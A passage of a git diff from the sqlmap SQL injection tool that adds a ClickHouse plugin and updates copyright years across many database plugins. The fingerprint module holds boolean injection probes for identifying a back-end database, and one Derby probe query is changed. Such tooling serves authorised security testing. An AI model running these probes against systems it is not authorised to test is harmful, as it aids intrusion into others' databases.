+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.data import logger
+from plugins.generic.enumeration import Enumeration as GenericEnumeration
+
+class Enumeration(GenericEnumeration):
+ def getPasswordHashes(self):
+ warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes"
+ logger.warning(warnMsg)
+
+ return {}
+
+ def getRoles(self, *args, **kwargs):
+ warnMsg = "on ClickHouse it is not possible to enumerate the user roles"
+ logger.warning(warnMsg)
+
+ return {}
diff --git a/plugins/dbms/clickhouse/filesystem.py b/plugins/dbms/clickhouse/filesystem.py
new file mode 100755
index 000000000..83b3aa178
--- /dev/null
+++ b/plugins/dbms/clickhouse/filesystem.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from plugins.generic.filesystem import Filesystem as GenericFilesystem
+
+class Filesystem(GenericFilesystem):
+ def readFile(self, remoteFile):
+ errMsg = "on ClickHouse it is not possible to read files"
+ raise SqlmapUnsupportedFeatureException(errMsg)
+
+ def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
+ errMsg = "on ClickHouse it is not possible to write files"
+ raise SqlmapUnsupportedFeatureException(errMsg)
diff --git a/plugins/dbms/clickhouse/fingerprint.py b/plugins/dbms/clickhouse/fingerprint.py
new file mode 100755
index 000000000..4007a6b8f
--- /dev/null
+++ b/plugins/dbms/clickhouse/fingerprint.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.common import Backend
+from lib.core.common import Format
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import DBMS
+from lib.core.session import setDbms
+from lib.core.settings import CLICKHOUSE_ALIASES
+from lib.request import inject
+from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
+
+class Fingerprint(GenericFingerprint):
+ def __init__(self):
+ GenericFingerprint.__init__(self, DBMS.CLICKHOUSE)
+
+ def getFingerprint(self):
+ value = ""
+ wsOsFp = Format.getOs("web server", kb.headersFp)
+
+ if wsOsFp:
+ value += "%s\n" % wsOsFp
+
+ if kb.data.banner:
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
+
+ if dbmsOsFp:
+ value += "%s\n" % dbmsOsFp
+
+ value += "back-end DBMS: "
+
+ if not conf.extensiveFp:
+ value += DBMS.CLICKHOUSE
+ return value
+
+ actVer = Format.getDbms()
+ blank = " " * 15
+ value += "active fingerprint: %s" % actVer
+
+ if kb.bannerFp:
+ banVer = kb.bannerFp.get("dbmsVersion")
+
+ if banVer:
+ banVer = Format.getDbms([banVer])
+ value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
+
+ htmlErrorFp = Format.getErrorParsedDBMSes()
+
+ if htmlErrorFp:
+ value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
+
+ return value
+
+ def checkDbms(self):
+ if not conf.extensiveFp and Backend.isDbmsWithin(CLICKHOUSE_ALIASES):
+ setDbms(DBMS.CLICKHOUSE)
+
+ self.getBanner()
+
+ return True
+
+ infoMsg = "testing %s" % DBMS.CLICKHOUSE
+ logger.info(infoMsg)
+
+ result = inject.checkBooleanExpression("halfMD5('abcd')='16356072519128051347'")
+
+ if result:
+ infoMsg = "confirming %s" % DBMS.CLICKHOUSE
+ logger.info(infoMsg)
+ result = inject.checkBooleanExpression("generateUUIDv4(1)!=generateUUIDv4(2)")
+
+ if not result:
+ warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
+ logger.warn(warnMsg)
+
+ return False
+
+ setDbms(DBMS.CLICKHOUSE)
+ self.getBanner()
+ return True
+ else:
+ warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
+ logger.warn(warnMsg)
+
+ return False
diff --git a/plugins/dbms/clickhouse/syntax.py b/plugins/dbms/clickhouse/syntax.py
new file mode 100755
index 000000000..2d4cfcaaf
--- /dev/null
+++ b/plugins/dbms/clickhouse/syntax.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.convert import getOrds
+from plugins.generic.syntax import Syntax as GenericSyntax
+
+class Syntax(GenericSyntax):
+ @staticmethod
+ def escape(expression, quote=True):
+ """
+ >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar"
+ True
+ """
+
+ def escaper(value):
+ return "||".join("char(%d)" % _ for _ in getOrds(value))
+
+ return Syntax._escape(expression, quote, escaper)
diff --git a/plugins/dbms/clickhouse/takeover.py b/plugins/dbms/clickhouse/takeover.py
new file mode 100755
index 000000000..8f862bf1a
--- /dev/null
+++ b/plugins/dbms/clickhouse/takeover.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from plugins.generic.takeover import Takeover as GenericTakeover
+
+class Takeover(GenericTakeover):
+ def osCmd(self):
+ errMsg = "on ClickHouse it is not possible to execute commands"
+ raise SqlmapUnsupportedFeatureException(errMsg)
+
+ def osShell(self):
+ errMsg = "on ClickHouse it is not possible to execute commands"
+ raise SqlmapUnsupportedFeatureException(errMsg)
+
+ def osPwn(self):
+ errMsg = "on ClickHouse it is not possible to establish an "
+ errMsg += "out-of-band connection"
+ raise SqlmapUnsupportedFeatureException(errMsg)
+
+ def osSmb(self):
+ errMsg = "on ClickHouse it is not possible to establish an "
+ errMsg += "out-of-band connection"
+ raise SqlmapUnsupportedFeatureException(errMsg)
diff --git a/plugins/dbms/cratedb/__init__.py b/plugins/dbms/cratedb/__init__.py
index 9d9a40b8a..843b75021 100644
--- a/plugins/dbms/cratedb/__init__.py
+++ b/plugins/dbms/cratedb/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/connector.py b/plugins/dbms/cratedb/connector.py
index 2b9b77829..15a2b48e3 100644
--- a/plugins/dbms/cratedb/connector.py
+++ b/plugins/dbms/cratedb/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/enumeration.py b/plugins/dbms/cratedb/enumeration.py
index 9f7c802d4..ce0ad614b 100644
--- a/plugins/dbms/cratedb/enumeration.py
+++ b/plugins/dbms/cratedb/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/filesystem.py b/plugins/dbms/cratedb/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/cratedb/filesystem.py
+++ b/plugins/dbms/cratedb/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/fingerprint.py b/plugins/dbms/cratedb/fingerprint.py
index 58b4796b4..26ee988e9 100644
--- a/plugins/dbms/cratedb/fingerprint.py
+++ b/plugins/dbms/cratedb/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/syntax.py b/plugins/dbms/cratedb/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/cratedb/syntax.py
+++ b/plugins/dbms/cratedb/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cratedb/takeover.py b/plugins/dbms/cratedb/takeover.py
index 3c8327351..87195fd1f 100644
--- a/plugins/dbms/cratedb/takeover.py
+++ b/plugins/dbms/cratedb/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/__init__.py b/plugins/dbms/cubrid/__init__.py
index 09716acd1..854ed4c0f 100644
--- a/plugins/dbms/cubrid/__init__.py
+++ b/plugins/dbms/cubrid/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/connector.py b/plugins/dbms/cubrid/connector.py
index e08b89a15..1be6d7d1a 100644
--- a/plugins/dbms/cubrid/connector.py
+++ b/plugins/dbms/cubrid/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/enumeration.py b/plugins/dbms/cubrid/enumeration.py
index 1a88581f3..edc434131 100644
--- a/plugins/dbms/cubrid/enumeration.py
+++ b/plugins/dbms/cubrid/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/filesystem.py b/plugins/dbms/cubrid/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/cubrid/filesystem.py
+++ b/plugins/dbms/cubrid/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/fingerprint.py b/plugins/dbms/cubrid/fingerprint.py
index 14e342159..375ee52e9 100644
--- a/plugins/dbms/cubrid/fingerprint.py
+++ b/plugins/dbms/cubrid/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/syntax.py b/plugins/dbms/cubrid/syntax.py
index c387389d3..3b75df165 100644
--- a/plugins/dbms/cubrid/syntax.py
+++ b/plugins/dbms/cubrid/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cubrid/takeover.py b/plugins/dbms/cubrid/takeover.py
index 361e4909e..063b2a2d5 100644
--- a/plugins/dbms/cubrid/takeover.py
+++ b/plugins/dbms/cubrid/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py
index 7bb040ba4..433dbb2bf 100644
--- a/plugins/dbms/db2/__init__.py
+++ b/plugins/dbms/db2/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py
index c8d02c1cd..d83845d98 100644
--- a/plugins/dbms/db2/connector.py
+++ b/plugins/dbms/db2/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py
index c5bd233fc..aca272372 100644
--- a/plugins/dbms/db2/enumeration.py
+++ b/plugins/dbms/db2/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/db2/filesystem.py
+++ b/plugins/dbms/db2/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index 5f53ff19a..14e6a56ca 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py
index 51d87d212..b6b6c633d 100644
--- a/plugins/dbms/db2/syntax.py
+++ b/plugins/dbms/db2/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py
index 1d0ae95f4..bcbc4b5e1 100644
--- a/plugins/dbms/db2/takeover.py
+++ b/plugins/dbms/db2/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/__init__.py b/plugins/dbms/derby/__init__.py
index f965c1150..4e1362b8a 100644
--- a/plugins/dbms/derby/__init__.py
+++ b/plugins/dbms/derby/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/connector.py b/plugins/dbms/derby/connector.py
index 732d6a231..004fb2ec8 100644
--- a/plugins/dbms/derby/connector.py
+++ b/plugins/dbms/derby/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/enumeration.py b/plugins/dbms/derby/enumeration.py
index 8bddb5472..58dbf9f59 100644
--- a/plugins/dbms/derby/enumeration.py
+++ b/plugins/dbms/derby/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/filesystem.py b/plugins/dbms/derby/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/derby/filesystem.py
+++ b/plugins/dbms/derby/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/fingerprint.py b/plugins/dbms/derby/fingerprint.py
index c9cb3c0bc..19d6f4c7c 100644
--- a/plugins/dbms/derby/fingerprint.py
+++ b/plugins/dbms/derby/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.DERBY
logger.info(infoMsg)
- result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 {LIMIT 1 OFFSET 0})")
+ result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 OFFSET 0 ROWS FETCH FIRST 1 ROW ONLY)")
if result:
infoMsg = "confirming %s" % DBMS.DERBY
diff --git a/plugins/dbms/derby/syntax.py b/plugins/dbms/derby/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/derby/syntax.py
+++ b/plugins/dbms/derby/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/derby/takeover.py b/plugins/dbms/derby/takeover.py
index 02a7e32bd..4628871ef 100644
--- a/plugins/dbms/derby/takeover.py
+++ b/plugins/dbms/derby/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/__init__.py b/plugins/dbms/extremedb/__init__.py
index 06ed0c841..ecc67a1e5 100644
--- a/plugins/dbms/extremedb/__init__.py
+++ b/plugins/dbms/extremedb/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/connector.py b/plugins/dbms/extremedb/connector.py
index c39deba8b..4b1cf53fb 100644
--- a/plugins/dbms/extremedb/connector.py
+++ b/plugins/dbms/extremedb/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/enumeration.py b/plugins/dbms/extremedb/enumeration.py
index 2f3e0aff5..c1440dcf6 100644
--- a/plugins/dbms/extremedb/enumeration.py
+++ b/plugins/dbms/extremedb/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/filesystem.py b/plugins/dbms/extremedb/filesystem.py
index ad6684435..99f47dd3b 100644
--- a/plugins/dbms/extremedb/filesystem.py
+++ b/plugins/dbms/extremedb/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/fingerprint.py b/plugins/dbms/extremedb/fingerprint.py
index 3ac51e2f4..f0e419a25 100644
--- a/plugins/dbms/extremedb/fingerprint.py
+++ b/plugins/dbms/extremedb/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/syntax.py b/plugins/dbms/extremedb/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/extremedb/syntax.py
+++ b/plugins/dbms/extremedb/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/extremedb/takeover.py b/plugins/dbms/extremedb/takeover.py
index d5c85b7f5..0796d3613 100644
--- a/plugins/dbms/extremedb/takeover.py
+++ b/plugins/dbms/extremedb/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py
index 41e961850..a6155b614 100644
--- a/plugins/dbms/firebird/__init__.py
+++ b/plugins/dbms/firebird/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py
index cabd43fda..28b0aa682 100644
--- a/plugins/dbms/firebird/connector.py
+++ b/plugins/dbms/firebird/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py
index 6da166bb3..2bf862617 100644
--- a/plugins/dbms/firebird/enumeration.py
+++ b/plugins/dbms/firebird/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py
index 2d35c0a72..f92c3d7ac 100644
--- a/plugins/dbms/firebird/filesystem.py
+++ b/plugins/dbms/firebird/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 2b0b4d46a..b6ddb1c4d 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index b03d1699b..56831d72e 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py
index e4c75689e..6ded04372 100644
--- a/plugins/dbms/firebird/takeover.py
+++ b/plugins/dbms/firebird/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/__init__.py b/plugins/dbms/frontbase/__init__.py
index 449b5dd09..53f9a22a8 100644
--- a/plugins/dbms/frontbase/__init__.py
+++ b/plugins/dbms/frontbase/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/connector.py b/plugins/dbms/frontbase/connector.py
index ce24422d9..4e25dd951 100644
--- a/plugins/dbms/frontbase/connector.py
+++ b/plugins/dbms/frontbase/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/enumeration.py b/plugins/dbms/frontbase/enumeration.py
index 0542df427..88596caac 100644
--- a/plugins/dbms/frontbase/enumeration.py
+++ b/plugins/dbms/frontbase/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/filesystem.py b/plugins/dbms/frontbase/filesystem.py
index 253bcffb1..ca58e1c50 100644
--- a/plugins/dbms/frontbase/filesystem.py
+++ b/plugins/dbms/frontbase/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/fingerprint.py b/plugins/dbms/frontbase/fingerprint.py
index 5f142b982..06d03371f 100644
--- a/plugins/dbms/frontbase/fingerprint.py
+++ b/plugins/dbms/frontbase/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/syntax.py b/plugins/dbms/frontbase/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/frontbase/syntax.py
+++ b/plugins/dbms/frontbase/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/frontbase/takeover.py b/plugins/dbms/frontbase/takeover.py
index db8852834..9eb74a13b 100644
--- a/plugins/dbms/frontbase/takeover.py
+++ b/plugins/dbms/frontbase/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py
index 8455010c2..f570b406c 100644
--- a/plugins/dbms/h2/__init__.py
+++ b/plugins/dbms/h2/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py
index 1bbdd5b78..f72a9ad4d 100644
--- a/plugins/dbms/h2/connector.py
+++ b/plugins/dbms/h2/connector.py
